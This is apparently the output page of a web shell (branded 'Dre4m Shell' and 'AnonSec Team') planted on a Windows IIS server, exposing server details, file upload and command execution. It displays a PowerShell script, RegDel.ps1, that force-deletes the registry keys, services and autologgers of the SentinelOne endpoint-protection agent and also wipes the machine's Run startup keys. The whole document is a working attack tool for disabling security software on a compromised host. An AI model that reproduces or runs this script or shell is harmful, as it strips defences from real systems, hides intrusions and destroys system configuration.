Dre4m Shell
Server IP : 103.6.199.200  /  Your IP : 18.223.213.76
Web Server : Microsoft-IIS/10.0
System : Windows NT EMPUSA 10.0 build 20348 (Windows Server 2016) i586
User : EMPUSA$ ( 0)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : C://RegDel.ps1
# Define the registry keys to be removed
$registryKeys = @(
    "HKCR:\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKCR:\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKCR:\AppID\SentinelHelperService",
    "HKCR:\CLSID\{28B58EFD-EED3-49D0-9AC3-A7A9E39A6303}",
    "HKCR:\CLSID\{DFE127B0-F72C-40FB-BEF8-9F29CB996B9C}",
    "HKCR:\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKCR:\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKCR:\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKCR:\SentinelAgent",
    "HKCR:\SentinelHelper",
    "HKCR:\SentinelOneLog",
    "HKCR:\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKCR:\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKCR:\WOW6432Node\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKCR:\WOW6432Node\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKCR:\WOW6432Node\AppID\SentinelHelperService",
    "HKCR:\WOW6432Node\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKCR:\WOW6432Node\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKCR:\WOW6432Node\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKCR:\AppID\SentinelAgent",
    "HKCR:\WOW6432Node\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKCR:\WOW6432Node\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\Classes\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\Classes\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\Classes\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\Classes\CLSID\{28B58EFD-EED3-49D0-9AC3-A7A9E39A6303}",
    "HKLM:\SOFTWARE\Classes\CLSID\{DFE127B0-F72C-40FB-BEF8-9F29CB996B9C}",
    "HKLM:\SOFTWARE\Classes\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\Classes\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\Classes\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\Classes\SentinelAgent",
    "HKLM:\SOFTWARE\Classes\SentinelHelper",
    "HKLM:\SOFTWARE\Classes\SentinelOneLog",
    "HKLM:\SOFTWARE\Classes\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\Classes\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\Classes\WOW6432Node\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Sentinel Agent",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelAgent.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelCtl.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelHelperService.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelRemediation.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngine.exe",
    "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngineScanner.exe",
    "HKLM:\SOFTWARE\SentinelOneLog",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\{1ECB7470-7BA4-4F64-A41D-BDF1B38DEED8}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\{4F58E51B-3F2B-4807-AB8C-2A7F143E9C3F}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\AppID\SentinelHelperService",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{0420773B-38C3-4300-AD2B-23652FEEE26C}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{51821FE8-516B-4BE3-9578-31B2DFAD4042}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\Interface\{8E470FB5-6800-4FF6-8E0A-620F676C912E}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\TypeLib\{667D5A92-7C14-4687-B20E-A5CF06FEF1AF}",
    "HKLM:\SOFTWARE\WOW6432Node\Classes\TypeLib\{BED0DAEE-A8DC-40E6-AAD6-DCA5532B746C}",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelAgent.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelCtl.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelHelperService.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelRemediation.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelServiceHost.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngine.exe",
    "HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SentinelStaticEngineScanner.exe",
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelLogger",
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelLogSessin0",
    "HKLM:\SYSTEM\ControlSet001\Control\WMI\Autologger\SentinelStatic",
    "HKLM:\SYSTEM\ControlSet001\Services\LogProcessorService",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelAgent",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelHelperService",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelMonitor",
    "HKLM:\SYSTEM\ControlSet001\Services\SentinelStaticEngine",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelLogger",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelLogSession0",
    "HKLM:\SYSTEM\CurrentControlSet\Control\WMI\Autologger\SentinelStatic",
    "HKLM:\SYSTEM\CurrentControlSet\Services\LogProcessorService",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelAgent",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelHelperService",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelMonitor",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelStaticEngine",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\LogProcessorService",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelAgent",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelHelperService",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelMonitor",
    "HKLM:\SYSTEM\Setup\FirstBoot\Services\SentinelStaticEngine",
    "HKCU:\Software\Microsoft\Windows\CurrentVersion\ApplicationAssociationToasts\SentinelOneLog_.binlog",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run",
    "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
    "HKLM:\SYSTEM\CurrentControlSet\Services\SentinelAgent",
    "HKLM:SOFTWARE\SentinelOneLog",
    "HKLM:\SYSTEM\CurrentControlSet\services\SentinelMonitor"
)

# Function to remove a registry key
function Remove-RegistryKey {
    param (
        [string]$keyPath
    )
    if (Test-Path $keyPath) {
        Remove-Item -Path $keyPath -Recurse -Force
        Write-Output "Removed: $keyPath"
    } else {
        Write-Output "Key not found: $keyPath"
    }
}

# Loop through each registry key and remove it
foreach ($key in $registryKeys) {
    Remove-RegistryKey -keyPath $key
}

Anon7 - 2022
AnonSec Team